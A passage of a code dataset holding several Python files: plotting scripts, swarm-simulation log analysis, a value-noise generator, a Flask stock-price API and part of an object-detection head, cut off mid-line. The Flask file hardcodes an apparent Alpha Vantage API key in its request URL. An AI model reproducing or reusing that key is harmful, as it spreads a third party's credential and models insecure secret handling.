plt\nimport numpy as np\n\nsistole = np.array([110, 120, 115, 100, 130])\ndiastole = np.array([70, 80, 75, 65, 90])\n\ntitleFont = {\"family\": \"serif\", \"color\": \"blue\", \"size\": 15}\nlabelFont = {\"family\": \"serif\", \"color\": \"orange\", \"size\": 8}\n\nplt.plot(sistole, \"D-r\", lw = \"1.5\")\nplt.plot(diastole, \"D-b\", lw = \"1\")\n\nplt.ylabel(\"Diastole / Sistole\", fontdict=labelFont)\nplt.xlabel(\"Blood Pressure Sample\", fontdict=labelFont)\n\nplt.title(\"Last 5 Blood Pressure Samples\", fontdict=titleFont, loc=\"right\")\n\nplt.grid() # Display all grid lines\nplt.show()","repo_name":"salvadororjuela/ScintificComputingWithPython","sub_path":"py4e/l18Matplotlib/9.0gridLines.py","file_name":"9.0gridLines.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43312527236","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport os\nimport subprocess\nfrom scipy.stats import t\n\ndef calcConfInt(p):\n    mean,var,size = np.mean(p),np.var(p),len(p)\n    alpha = 0.01\n    df = size - 1\n    unbiased_sd = math.sqrt((size/df)*var)\n    t_variate = t.ppf(1-alpha/2,df)\n    uppervalue = mean + t_variate * unbiased_sd/math.sqrt(size)\n    return uppervalue\n\n\nalgorithmsLabels = [\"EE\",\"PCC-EE\",\"PCC\",\"SQF\"];\nsuffix_file_list = ['nonholo','holo']\nrad = [0.4,0.5,0.6,0.7,0.8,0.9,1.0]\nlogLines = 13+1\n# labels to ignore when plotting the graph of not-allowed logs.\nignoreLabels = []\n\nalgorithmsDict = {}\nalgorithmsSymbolDict = {}\nprefixNumDict = {}\n\nsuffix_file = 'nonholo'\nalgorithmsDict[suffix_file] = ['../target_ee','../target_pcc-ee','../target_pcc','../target_topdown_influence']\nalgorithmsSymbolDict[suffix_file] = [\".\"]*len(algorithmsLabels)\nprefixNumDict[suffix_file] = ['rad']*len(algorithmsLabels)\n\nsuffix_file = 'holo'\nalgorithmsDict[suffix_file] = ['../target_holonomic_ee','../target_holonomic_pcc-ee','../target_holonomic_pcc','../target_holonomic_topdown_influence']\nalgorithmsSymbolDict[suffix_file] = [\".\"]*len(algorithmsLabels)\nprefixNumDict[suffix_file] = ['rad']*len(algorithmsLabels)\n\nksamples = 40\nnSamples = 
np.full((len(rad),len(algorithmsLabels),len(suffix_file_list)), ksamples)\ndata = np.zeros((len(rad),len(algorithmsLabels),ksamples,logLines,len(suffix_file_list)));\ndataMean = np.zeros((len(rad),len(algorithmsLabels),logLines,len(suffix_file_list)));\ndataUpCi = np.zeros((len(rad),len(algorithmsLabels),logLines,len(suffix_file_list)));\nnNotAllowed = np.zeros((len(rad),len(algorithmsLabels),len(suffix_file_list)))\n\n#Count how many logs has maximum allowed time\nfor i_sf, suffix_file in enumerate(suffix_file_list):\n algorithms = algorithmsDict[suffix_file] \n prefixNum = prefixNumDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n for n in range(len(rad)):\n algorithm = algorithms[a];\n for s in range(nSamples[n,a,i_sf]):\n dataFile = open(algorithm+\"/\"+prefixNum[a]+('%.1f' % rad[n])+\"/log_\"+str(s));\n dataFileStr = dataFile.readlines();\n if int(dataFileStr[10]) >= 20*60*1000000:\n nNotAllowed[n,a,i_sf] += 1;\n\nprintNumberLogs = False\n\n\ndef plotBar(i,W,N,Xms,Ys,my_label):\n '''\n Plot the i-th bars for a alternate bars graph.\n i: i-th bar to plot;\n W: width of all bars together;\n N: total number of bars;\n Xms: middle x-axis coordinate of all bars together;\n Ys: list of y-axis coordinate values of the i-th bar;\n my_label: the label for the i-th bar.\n '''\n pos = [Xm + (W*(2*i-N+1))/(2*N) for Xm in Xms]\n plt.bar(pos,Ys,width=W/N,label=my_label)\n\ndef plotNumber(i,W,N,Xms,Ys):\n '''\n Plot the number in Ys as text above the i-th bar.\n i: i-th bar to plot;\n W: width of all bars together;\n N: total number of bars;\n Xms: middle x-axis coordinate of all bars together;\n Ys: list of y-axis coordinate values of the i-th bar;\n '''\n pos = [Xm + W*(2*i-N+1)/(2*N) for Xm in Xms]\n for i in range(len(Ys)):\n plt.annotate(str(int(Ys[i])),(pos[i],Ys[i]),ha='center')\n\nplt.rcParams.update({'font.size': 15})\n\ndef imgAllowed():\n #Save a figure showing the number of logs with maximum allowed time\n for i_sf, suffix_file in enumerate(suffix_file_list):\n for a in range(len(algorithmsLabels)):\n if not (algorithmsLabels[a] in ignoreLabels):\n plotBar(a,(1-0.10)*0.1,len(algorithmsLabels),rad,nNotAllowed[:len(rad),a,i_sf],algorithmsLabels[a])\n if printNumberLogs:\n plotNumber(a,(1-0.10)*0.1,len(algorithmsLabels),rad,nNotAllowed[:len(rad),a,i_sf])\n plt.xticks(rad)\n if len(algorithmsLabels) > 1:\n plt.legend(loc='center right');\n plt.ylabel(\"Number of fails\");\n plt.xlabel(\"Radius of target area\");\n plt.savefig(\"FigureNotAllowedLogs\"+suffix_file+\".png\",bbox_inches=\"tight\");\n plt.savefig(\"FigureNotAllowedLogs\"+suffix_file+\".pdf\",bbox_inches=\"tight\");\n plt.clf();\n \n\nfor i_sf, suffix_file in enumerate(suffix_file_list):\n algorithms = algorithmsDict[suffix_file] \n prefixNum = prefixNumDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n for n in range(len(rad)):\n algorithm = algorithms[a];\n index_list = []\n for s in range(nSamples[n,a,i_sf]):\n dataFile = open(algorithm+\"/\"+prefixNum[a]+('%.1f' % rad[n])+\"/log_\"+str(s));\n dataFileStr = dataFile.readlines();\n if int(dataFileStr[10]) >= 20*60*1000000: continue\n index_list.append(s)\n for fileline in range(logLines):\n if fileline == 13:\n FirstRobotReachingTimeline = 8 \n LastRobotReachingTimeline = 9\n # number of robots is 100\n data[n,a,s,fileline,i_sf] = 99/((float(dataFileStr[LastRobotReachingTimeline]) - float(dataFileStr[FirstRobotReachingTimeline]))/1e6);\n elif fileline in [11,12]:\n data[n,a,s,fileline,i_sf] = float(dataFileStr[fileline]);\n elif fileline in [8,9,10]:\n 
data[n,a,s,fileline,i_sf] = float(dataFileStr[fileline])/1e6;\n else:\n data[n, a, s, fileline,i_sf] = int(dataFileStr[fileline]);\n if index_list != []:\n for fileline in range(logLines):\n tmp_data = [data[n,a,s,fileline,i_sf] for s in index_list]\n dataMean[n,a,fileline,i_sf] = np.mean(tmp_data);\n if all(dataMean[n,a,fileline,i_sf] == rest for rest in tmp_data):\n dataUpCi[n,a,fileline,i_sf] = dataMean[n,a,fileline,i_sf]\n else:\n dataUpCi[n,a,fileline,i_sf] = calcConfInt(tmp_data);\n\ndef main(fileline):\n for i_sf, suffix_file in enumerate(suffix_file_list):\n algorithmsSymbol = algorithmsSymbolDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n allowedRad = []\n for n in range(len(rad)):\n if nSamples[n,a,i_sf] - nNotAllowed[n,a,i_sf] > 1:\n allowedRad.append(n)\n if allowedRad != []:\n tmpRad = [rad[i] for i in allowedRad]\n tmpDataMean = [dataMean[n,a,fileline,i_sf] for n in allowedRad]\n tmpyErr = [dataUpCi[n,a,fileline,i_sf] - dataMean[n,a,fileline,i_sf] for n in allowedRad]\n plt.errorbar(tmpRad,tmpDataMean, yerr=tmpyErr, label=algorithmsLabels[a],marker=algorithmsSymbol[a],capsize=5,linestyle='solid' if algorithmsLabels[a] != 'SQF' else 'dashed');\n if printNumberLogs:\n valuesStr = [str(int(nSamples[n,a,i_sf] - nNotAllowed[n,a,i_sf])) for n in allowedRad]\n for i in range(len(valuesStr)):\n plt.annotate(valuesStr[i],(tmpRad[i],tmpDataMean[i]))\n if len(algorithmsLabels) > 1:\n plt.legend(loc=0);\n plt.xlabel(\"Radius of target area (m)\");\n list_line_ylabel = [ \n # Label # index\n #----------------------------------------------------------#------\n \"Total number of iterations\", # 0\n \"Total iterations of the last robot\", # 1\n \"Number of messages\", # 2\n \"Summation of the iter. for reaching\", # 3\n \"Summation of the iter. 
for exiting\",              # 4\n        \"Last robot's iterations for reaching\",        # 5\n        \"Last robot's iterations for exiting\",         # 6\n        \"Stalls\",                                      # 7\n        \"First robot's reaching time (s)\",             # 8\n        \"Last robot's reaching time (s)\",              # 9\n        \"Total time of the simulation (s)\",            # 10\n        \"Minimum distance (m)\",                        # 11\n        \"Maximum velocity (m/s)\",                      # 12\n        \"Throughput (1/s)\"                             # 13\n    ]\n    plt.ylabel(list_line_ylabel[fileline])\n    plt.savefig(\"FigureRad\"+str(fileline)+suffix_file+\".png\",bbox_inches=\"tight\");\n    plt.savefig(\"FigureRad\"+str(fileline)+suffix_file+\".pdf\",bbox_inches=\"tight\");\n    plt.clf();\n\n\n\nimgAllowed()\nmain(9)\n# ~ main(10)\n","repo_name":"yuri-tavares/swarm-common-target-area-congestion","sub_path":"common/analyseRad.py","file_name":"analyseRad.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21837361466","text":"from numbers import Number\nfrom collections.abc import Sequence\nimport random\nimport math\n\ndef c_mul(a, b):\n    # 32-bit wrap-around multiply; the original eval(hex(...)[:-1]) trick was a Python 2 idiom\n    return (int(a) * b) & 0xFFFFFFFF\ndef hashtuplesafe(tup):\n    value = 0x345678\n    for item in tup:\n        value = c_mul(1000003, value) ^ hash(item)\n    value = value ^ len(tup)\n    if value == -1:\n        value = -2\n    return value\ndef replwfunc(o):\n    if isinstance(o, Number):\n        cache = o\n        o = lambda i: cache\n    elif isinstance(o, Sequence):\n        o = o.__getitem__\n    return o\n#------------------------------------------------------------------------------ \n# Method 2 from http://lodev.org/cgtutor/randomnoise.html\nclass ValueNoise:\n    \"\"\"\n    frequency - A smaller number generates a more \"zoomed-in\" terrain with fewer details\n    octaves - A smaller number generates more lakes; 0.4 and 10 give a good result for 320*240 in 2 seconds\n    \"\"\"\n    def __init__(self, frequency=0.4, amplitude=1, octaves=10, seed=0):\n        # octaves must be an int: it is passed to range() in generate()\n        self.frequency = replwfunc(frequency)\n        self.amplitude = replwfunc(amplitude)\n        self.octaves = octaves\n        self.seed = seed\n        self.random = random.Random()\n        self.noisemap = {}\n        self.resultmap = {}\n        self.xycmap = {}\n    def noise(self, x, y):\n        key = (x, y, self.seed)\n        noise = self.noisemap\n        if key not in noise:\n            random.seed(hashtuplesafe((hashtuplesafe(key), hashtuplesafe(key))))\n            random.seed(random.randint(0, 0xFFFFFFFF))\n            noise[key] = random.randint(0, 1000) / 1000\n        return noise[key]\n    def smooth_noise(self, x, y):\n        \"\"\"Returns the average value of the 4 neighbors of (x, y) from the\n        noise array.\"\"\"\n\n        fractX = x - int(x)\n        fractY = y - int(y)\n\n        x1 = int(x)\n        y1 = int(y)\n\n        x2 = x1 - 1\n        y2 = y1 - 1\n\n        #Bilinear interpolation http://en.wikipedia.org/wiki/Bilinear_interpolation\n        value = 0.0\n        value += fractX * fractY * self.noise(y1, x1)\n        value += fractX * (1 - fractY) * self.noise(y2, x1)\n        value += (1 - fractX) * fractY * self.noise(y1, x2)\n        value += (1 - fractX) * (1 - fractY) * self.noise(y2, x2)\n\n        return value\n    def generate(self, x, y):\n        \"\"\"\n        Generate dat value noise, boi\n        \"\"\"\n\n        key = (x, y, self.seed)\n\n        result = self.resultmap\n        if key not in result:\n            result[key] = 128 * sum(self.smooth_noise(x*self.frequency(n), y*self.frequency(n))*self.amplitude(n) for n in range(self.octaves)) / self.octaves\n\n        return (result[key],)\n\n__all__ = [\"ValueNoise\"]\n","repo_name":"postcursor-laboratories/ConWorld","sub_path":"map/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
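A minimal usage sketch for the ValueNoise class above (grid size chosen arbitrarily); generate() returns a 1-tuple, so the sample is unpacked with [0]:

noise = ValueNoise(frequency=0.4, amplitude=1, octaves=10, seed=7)
heightmap = [[noise.generate(x, y)[0] for x in range(64)] for y in range(64)]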
+{"seq_id":"18687261175","text":"import json\nimport urllib.request\nimport objectpath\n\n### To access data points\nfrom flask import Flask\nfrom flask_restful import Api, Resource, reqparse\n\nintervals = ['1', '5', '15', '30', '60']\n\nclass Data(Resource):\n    def get(self, symbol, interval):\n        if interval in intervals:\n            return get_stock_prices_by_symbol(symbol, interval), 200\n        else:\n            return 'No such interval.'\n\n# def get_interval(interval):\n#     return interval\n\ndef create_url(symbol, interval):\n    return 'https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=' + symbol + '&interval=' + interval + 'min&apikey=D01PQMVRIUNEQYRW'\n\ndef _request(symbol, interval):\n    with urllib.request.urlopen(create_url(symbol, interval)) as req:\n        data = req.read().decode(\"UTF-8\")\n    return data\n\ndef get_stock_prices_by_symbol(symbol, interval):\n    c = json.loads(_request(symbol, interval))['Time Series ('+ interval +'min)']\n    json.dumps(c)\n\n    ## 1. open values\n    tree = objectpath.Tree(c)\n    result = tree.execute(\"$..'1. open'\")\n    values = list()\n    for i in result:\n        values.append(i)\n\n    ### time\n    times = list()\n    for i in c:\n        times.append(i)\n\n    ### data\n    data_points = []\n    data_points_len = len(times)\n    idx = 0\n    while idx != data_points_len:\n        data_points.append({\"time\": times[idx],\"value\": float(values[idx])})\n        idx = idx + 1\n\n    return data_points\n\n# print(Data_points)\n#### To access data points\napp = Flask(__name__)\napi = Api(app)\n\napi.add_resource(Data, \"/api/data/<symbol>/<interval>\")\napp.run(debug=True)","repo_name":"bartekwichowski/visual-app","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
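A quick manual check of the endpoint above, assuming the service is running locally on Flask's default port and MSFT is a hypothetical symbol:

import requests
resp = requests.get('http://127.0.0.1:5000/api/data/MSFT/5')  # 5-minute interval
print(resp.status_code, resp.json()[:2])  # first two {time, value} points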
+{"seq_id":"34824907514","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom mmcv.cnn import ConvModule, Scale, bias_init_with_prob, normal_init\nfrom mmcv.ops import DeformConv2d\nfrom mmcv.runner import force_fp32\nimport torch.nn.functional as F\nfrom mmdet.core import (bbox2distance, bbox_overlaps, build_anchor_generator,\n                        build_assigner, build_sampler, distance2bbox,\n                        multi_apply, multiclass_nms, reduce_mean)\nfrom ..builder import HEADS, build_loss\nfrom .atss_head import ATSSHead\nfrom .fcos_head import FCOSHead\nfrom .paa_atss_head import PAA_ATSSHead\ntry:\n    import sklearn.mixture as skm\nexcept ImportError:\n    skm = None\n\nINF = 1e8\n\ndef levels_to_images(mlvl_tensor):\n    \"\"\"Concat multi-level feature maps by image.\n    [feature_level0, feature_level1...] -> [feature_image0, feature_image1...]\n    Convert the shape of each element in mlvl_tensor from (N, C, H, W) to\n    (N, H*W, C), then split the element to N elements with shape (H*W, C), and\n    concat elements in same image of all level along first dimension.\n    Args:\n        mlvl_tensor (list[torch.Tensor]): list of Tensor collected from\n            the corresponding level. Each element is of shape (N, C, H, W)\n    Returns:\n        list[torch.Tensor]: A list that contains N tensors and each tensor is\n            of shape (num_elements, C)\n    \"\"\"\n    batch_size = mlvl_tensor[0].size(0)\n    batch_list = [[] for _ in range(batch_size)]\n    channels = mlvl_tensor[0].size(1)\n    for t in mlvl_tensor:\n        t = t.permute(0, 2, 3, 1)\n        t = t.view(batch_size, -1, channels).contiguous()\n        for img in range(batch_size):\n            batch_list[img].append(t[img])\n    return [torch.cat(item, 0) for item in batch_list]\n\n@HEADS.register_module()\nclass VFocalPAAHead(PAA_ATSSHead, ATSSHead, FCOSHead):\n    \"\"\"Head of `VarifocalNet (VFNet): An IoU-aware Dense Object\n    Detector.`_.\n    The VFNet predicts IoU-aware classification scores which mix the\n    object presence confidence and object localization accuracy as the\n    detection score. It is built on the FCOS architecture and uses ATSS\n    for defining positive/negative training examples. The VFNet is trained\n    with Varifocal Loss and employs star-shaped deformable convolution to\n    extract features for a bbox.\n    Args:\n        num_classes (int): Number of categories excluding the background\n            category.\n        in_channels (int): Number of channels in the input feature map.\n        regress_ranges (tuple[tuple[int, int]]): Regress range of multiple\n            level points.\n        center_sampling (bool): If true, use center sampling. Default: False.\n        center_sample_radius (float): Radius of center sampling. Default: 1.5.\n        sync_num_pos (bool): If true, synchronize the number of positive\n            examples across GPUs. Default: True\n        gradient_mul (float): The multiplier to gradients from bbox refinement\n            and recognition. Default: 0.1.\n        bbox_norm_type (str): The bbox normalization type, 'reg_denom' or\n            'stride'. Default: reg_denom\n        loss_cls_fl (dict): Config of focal loss.\n        use_vfl (bool): If true, use varifocal loss for training.\n            Default: True.\n        loss_cls (dict): Config of varifocal loss.\n        loss_bbox (dict): Config of localization loss, GIoU Loss.\n        loss_bbox_refine (dict): Config of localization refinement loss, GIoU Loss.\n        norm_cfg (dict): dictionary to construct and config norm layer.\n            Default: norm_cfg=dict(type='GN', num_groups=32,\n            requires_grad=True).\n        use_atss (bool): If true, use ATSS to define positive/negative\n            examples. 
Default: True.\n anchor_generator (dict): Config of anchor generator for ATSS.\n Example:\n >>> self = VFNetHead(11, 7)\n >>> feats = [torch.rand(1, 7, s, s) for s in [4, 8, 16, 32, 64]]\n >>> cls_score, bbox_pred, bbox_pred_refine= self.forward(feats)\n >>> assert len(cls_score) == len(self.scales)\n \"\"\" # noqa: E501\n\n def __init__(self,\n num_classes,\n in_channels,\n regress_ranges=((-1, 64), (64, 128), (128, 256), (256, 512),\n (512, INF)),\n center_sampling=False,\n center_sample_radius=1.5,\n sync_num_pos=True,\n gradient_mul=0.1,\n topk=9,\n bbox_norm_type='reg_denom',\n loss_cls_fl=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n use_vfl=True,\n loss_cls=dict(\n type='VarifocalLoss',\n use_sigmoid=True,\n alpha=0.75,\n gamma=2.0,\n iou_weighted=True,\n loss_weight=1.0),\n loss_bbox=dict(type='GIoULoss', loss_weight=1.5),\n loss_bbox_refine=dict(type='GIoULoss', loss_weight=2.0),\n norm_cfg=dict(type='GN', num_groups=32, requires_grad=True),\n assign_type=\"paa\",\n anchor_generator=dict(\n type='AnchorGenerator',\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n center_offset=0.0,\n strides=[8, 16, 32, 64, 128]),\n **kwargs):\n # dcn base offsets, adapted from reppoints_head.py\n self.topk=topk\n self.num_out = len(anchor_generator[\"strides\"])\n self.anchor_generator = build_anchor_generator(anchor_generator)\n self.num_anchors = self.anchor_generator.num_base_anchors[0]\n super(FCOSHead, self).__init__(\n num_classes, in_channels, norm_cfg=norm_cfg, **kwargs)\n\n self.regress_ranges = regress_ranges\n self.reg_denoms = [\n regress_range[-1] for regress_range in regress_ranges\n ]\n self.reg_denoms[-1] = self.reg_denoms[-2] * 2\n self.center_sampling = center_sampling\n self.center_sample_radius = center_sample_radius\n self.sync_num_pos = sync_num_pos\n self.bbox_norm_type = bbox_norm_type\n self.gradient_mul = gradient_mul\n self.use_vfl = use_vfl\n if self.use_vfl:\n self.loss_cls = build_loss(loss_cls)\n else:\n self.loss_cls = build_loss(loss_cls_fl)\n self.loss_bbox = build_loss(loss_bbox)\n self.loss_bbox_refine = build_loss(loss_bbox_refine)\n\n # for getting ATSS targets\n self.assign_type = assign_type\n if self.assign_type == 'paa':\n # paa_assign_cls_loss = dict(type='FocalLoss', use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0)\n paa_assign_cls_loss = loss_cls_fl\n self.paa_assign_cls_loss = build_loss(paa_assign_cls_loss)\n\n self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)\n self.anchor_center_offset = anchor_generator['center_offset']\n self.num_anchors = self.anchor_generator.num_base_anchors[0]\n self.sampling = False\n if self.train_cfg:\n self.assigner = build_assigner(self.train_cfg.assigner)\n sampler_cfg = dict(type='PseudoSampler')\n self.sampler = build_sampler(sampler_cfg, context=self)\n\n def _init_layers(self):\n \"\"\"Initialize layers of the head.\"\"\"\n self.relu = nn.ReLU(inplace=True)\n self.mlvl_cls_convs = nn.ModuleList()\n self.mlvl_reg_convs = nn.ModuleList()\n self.mlvl_vfl_cls_convs = nn.ModuleList()\n self.mlvl_vfl_reg_convs = nn.ModuleList()\n self.mlvl_vfl_reg = nn.ModuleList()\n self.mlvl_vfl_refine_convs = nn.ModuleList()\n self.mlvl_scale = nn.ModuleList()\n self.mlvl_refine_scale = nn.ModuleList()\n\n\n for level in range(self.num_out):\n cls_convs = nn.ModuleList()\n reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n cls_convs.append(\n ConvModule(\n chn,\n 
self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n\n vfl_cls_convs = nn.Conv2d(self.feat_channels, self.cls_out_channels, 1, padding=0)\n vfl_reg_convs = ConvModule(self.feat_channels, self.feat_channels, 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg,\n bias=self.conv_bias)\n\n vfl_refine_convs = nn.Conv2d(self.feat_channels, 4, 1, padding=0)\n vfl_reg = nn.Conv2d(self.feat_channels, 4, 1, padding=0)\n\n scale = Scale(1.0)\n scale_refine = Scale(1.0)\n\n self.mlvl_cls_convs.append(cls_convs)\n self.mlvl_reg_convs.append(reg_convs)\n self.mlvl_vfl_cls_convs.append(vfl_cls_convs)\n self.mlvl_vfl_reg_convs.append(vfl_reg_convs)\n self.mlvl_vfl_refine_convs.append(vfl_refine_convs)\n self.mlvl_vfl_reg.append(vfl_reg)\n\n self.mlvl_scale.append(scale)\n self.mlvl_refine_scale.append(scale_refine)\n\n def init_weights(self):\n \"\"\"Initialize weights of the head.\"\"\"\n for level in range(self.num_out):\n for m in self.mlvl_cls_convs[level]:\n if isinstance(m.conv, nn.Conv2d):\n normal_init(m.conv, std=0.01)\n for m in self.mlvl_reg_convs[level]:\n if isinstance(m.conv, nn.Conv2d):\n normal_init(m.conv, std=0.01)\n normal_init(self.mlvl_vfl_reg[level], std=0.01)\n # normal_init(self.mlvl_vfl_cls_convs[level], std=0.01)\n normal_init(self.mlvl_vfl_reg_convs[level].conv, std=0.01)\n normal_init(self.mlvl_vfl_refine_convs[level], std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.mlvl_vfl_cls_convs[level], std=0.01, bias=bias_cls)\n\n def forward(self, feats, onnx=False):\n \"\"\"Forward features from the upstream network.\n Args:\n feats (tuple[Tensor]): Features from the upstream network, each is\n a 4D-tensor.\n Returns:\n tuple:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level, each is a 4D-tensor, the channel number is\n num_points * num_classes.\n bbox_preds (list[Tensor]): Box offsets for each\n scale level, each is a 4D-tensor, the channel number is\n num_points * 4.\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level, each is a 4D-tensor, the channel\n number is num_points * 4.\n \"\"\"\n return multi_apply(self.forward_single, feats, self.mlvl_scale,\n self.mlvl_refine_scale, self.strides, self.reg_denoms,\n [level for level in range(self.num_out)],\n [onnx for _ in range(len(feats))])\n\n def forward_single(self, x, scale, scale_refine, stride, reg_denom, level, onnx=False):\n \"\"\"Forward features of a single scale level.\n Args:\n x (Tensor): FPN feature maps of the specified stride.\n scale (:obj: `mmcv.cnn.Scale`): Learnable scale module to resize\n the bbox prediction.\n scale_refine (:obj: `mmcv.cnn.Scale`): Learnable scale module to\n resize the refined bbox prediction.\n stride (int): The corresponding stride for feature maps,\n used to normalize the bbox prediction when\n bbox_norm_type = 'stride'.\n reg_denom (int): The corresponding regression range for feature\n maps, only used to normalize the bbox prediction when\n bbox_norm_type = 'reg_denom'.\n Returns:\n tuple: iou-aware cls scores for each box, bbox predictions and\n refined bbox predictions of input feature maps.\n \"\"\"\n cls_feat = x\n reg_feat = x\n\n for cls_layer in self.mlvl_cls_convs[level]:\n cls_feat = cls_layer(cls_feat)\n\n for reg_layer in self.mlvl_reg_convs[level]:\n reg_feat = reg_layer(reg_feat)\n\n # 
predict the bbox_pred of different level\n reg_feat_init = self.mlvl_vfl_reg_convs[level](reg_feat)\n if onnx:\n bbox_pred = self.mlvl_vfl_reg[level](reg_feat_init)\n scale = reg_denom*scale.scale\n\n bbox_pred = scale*bbox_pred\n bbox_pred_refine = scale_refine(self.mlvl_vfl_refine_convs[level](reg_feat))\n bbox_pred_refine = bbox_pred_refine * bbox_pred.detach()\n\n cls_score = F.sigmoid(self.mlvl_vfl_cls_convs[level](cls_feat))\n return cls_score, bbox_pred_refine\n elif self.bbox_norm_type == 'reg_denom':\n bbox_pred = scale(\n # self.mlvl_vfl_reg[level](reg_feat_init)).exp() * reg_denom\n self.mlvl_vfl_reg[level](reg_feat_init)) * reg_denom\n elif self.bbox_norm_type == 'stride':\n bbox_pred = scale(\n self.mlvl_vfl_reg[level](reg_feat_init)) * stride\n # self.mlvl_vfl_reg[level](reg_feat_init)).exp() * stride\n else:\n raise NotImplementedError\n\n # compute star deformable convolution offsets\n # converting dcn_offset to reg_feat.dtype thus VFNet can be\n # trained with FP16\n\n # refine the bbox_pred\n\n bbox_pred_refine = scale_refine(\n self.mlvl_vfl_refine_convs[level](reg_feat))\n # self.mlvl_vfl_refine_convs[level](reg_feat)).float().exp()\n bbox_pred_refine = bbox_pred_refine * bbox_pred.detach()\n\n # predict the iou-aware cls score\n cls_score = self.mlvl_vfl_cls_convs[level](cls_feat)\n\n return cls_score, bbox_pred, bbox_pred_refine\n # import pysnooper\n # @pysnooper.snoop(depth=2)\n @force_fp32(apply_to=('cls_scores', 'bbox_preds', 'bbox_preds_refine'))\n def loss(self,\n cls_scores,\n bbox_preds,\n bbox_preds_refine,\n gt_bboxes,\n gt_labels,\n img_metas,\n gt_bboxes_ignore=None):\n \"\"\"Compute loss of the head.\n Args:\n cls_scores (list[Tensor]): Box iou-aware scores for each scale\n level, each is a 4D-tensor, the channel number is\n num_points * num_classes.\n bbox_preds (list[Tensor]): Box offsets for each\n scale level, each is a 4D-tensor, the channel number is\n num_points * 4.\n bbox_preds_refine (list[Tensor]): Refined Box offsets for\n each scale level, each is a 4D-tensor, the channel\n number is num_points * 4.\n gt_bboxes (list[Tensor]): Ground truth bboxes for each image with\n shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.\n gt_labels (list[Tensor]): class indices corresponding to each box\n img_metas (list[dict]): Meta information of each image, e.g.,\n image size, scaling factor, etc.\n gt_bboxes_ignore (None | list[Tensor]): specify which bounding\n boxes can be ignored when computing the loss.\n Default: None.\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert len(cls_scores) == len(bbox_preds) == len(bbox_preds_refine)\n device = cls_scores[0].device\n num_imgs = len(img_metas)\n\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\n all_level_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,\n bbox_preds[0].device)\n\n anchor_list, valid_flag_list = PAA_ATSSHead.get_anchors(self,\n featmap_sizes, img_metas, device=device)\n\n if self.assign_type == 'paa':\n labels, label_weights, \\\n bbox_targets, bbox_weights, \\\n pos_inds_image, pos_gt_index_image = self.get_targets(\n cls_scores, all_level_points, gt_bboxes, gt_labels, img_metas,\n gt_bboxes_ignore)\n else:\n labels, label_weights, bbox_targets, bbox_weights = self.get_targets(\n cls_scores, all_level_points, gt_bboxes, gt_labels, img_metas,\n gt_bboxes_ignore)\n\n cls_scores = levels_to_images(cls_scores)\n cls_scores = [item.reshape(-1, self.cls_out_channels) for item in cls_scores]\n\n bbox_preds = 
levels_to_images(bbox_preds)\n bbox_preds = [item.reshape(-1, 4) for item in bbox_preds]\n\n bbox_preds_refine = levels_to_images(bbox_preds_refine)\n bbox_preds_refine = [item.reshape(-1, 4) for item in bbox_preds_refine]\n\n if self.assign_type == 'paa':\n all_level_points_cat = [torch.cat(all_level_points) for _ in range(num_imgs)]\n # # print(\"paa get_pos_loss start\")\n pos_losses_list, = multi_apply(self.get_pos_loss,\n cls_scores, bbox_preds, bbox_preds_refine,\n labels, label_weights,\n bbox_targets, bbox_weights,\n all_level_points_cat,\n pos_inds_image)\n # print(\"paa get_pos_loss end\")\n with torch.no_grad():\n # print(\"paa_reassign start\")\n labels, label_weights, bbox_weights, num_pos = multi_apply(\n self.paa_reassign,\n pos_losses_list,\n labels,\n label_weights,\n bbox_weights,\n pos_inds_image,\n pos_gt_index_image,\n anchor_list,\n )\n # print(\"paa_reassign end\")\n\n bg_class_ind = self.num_classes\n # flatten cls_scores, bbox_preds and bbox_preds_refine\n if self.assign_type == 'paa':\n # print(\"assign_type start\")\n #num_batch is first dim\n flatten_cls_scores = torch.cat(cls_scores, 0).view(-1, cls_scores[0].size(-1))\n flatten_bbox_preds = torch.cat(bbox_preds, 0).view(-1, bbox_preds[0].size(-1))\n flatten_bbox_preds_refine = torch.cat(bbox_preds_refine, 0).view(-1, bbox_preds_refine[0].size(-1))\n\n flatten_points = torch.cat(all_level_points_cat)\n flatten_labels = torch.cat(labels, 0).view(-1)\n flatten_bbox_targets = torch.cat(bbox_targets,\n 0).view(-1, bbox_targets[0].size(-1))\n\n pos_inds = ((flatten_labels >= 0) & (flatten_labels < self.num_classes)).nonzero().reshape(-1)\n # print(\"assign_type end\")\n else:\n # num_level is first dim\n flatten_cls_scores = [\n 